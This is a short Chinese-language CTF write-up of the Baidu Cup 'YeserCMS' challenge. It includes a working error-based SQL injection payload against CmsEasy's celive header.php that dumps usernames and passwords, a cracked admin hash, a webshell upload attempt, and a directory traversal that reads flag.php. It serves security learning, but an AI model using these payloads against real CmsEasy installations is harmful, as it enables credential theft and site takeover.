百度杯”CTF比賽 九月場YeserCMS

百度杯”CTF比賽 九月場YeserCMS
           

打開網站，看見YESERCMS，查了下好像沒有這個CMS，直接CMS指紋識别一下，發現是CMSEASY。

網上找相關GETSHELL漏洞，發現一個僞造IP進入背景的洞，但是PING不通，暫時無法獲得準确的IP位址，最後在http://www.hacksec.cn/codesec/378.html部落格上發現SQL注入漏洞。

POC:

http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads /celive/live/header.php

xajax=LiveMessage&xajaxargs[0]=name’, (UpdateXML(1,CONCAT(0x5b,mid((SELECTGROUP_CONCAT(concat(username,’|’,password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)–%20

發現URL不能通路，檢視其它的注入文章時（https://www.secpulse.com/archives/41265.html）發現将upload目錄去掉。

注入結果：Table ‘Yeser.cmseasy_user’ doesn’t exist

可能不是原本的資料庫，先猜測資料庫名稱為yesercms_user,修改查詢的長度，得到完整的賬戶密碼。

XPATH syntax error: '[admin|ff512d4240cbbdeafada404677ccb

MD5：Yeser231

在專題目錄嘗試一句話木馬，木馬上傳成功，但是無法通路

題目提示flag.php在根目錄，在模闆編輯頁面發現可以編輯html的内容，抓包可以看出通過ID參數擷取HTML的内容，嘗試目錄周遊最終在…/…/flag.php中擷取到flag的内容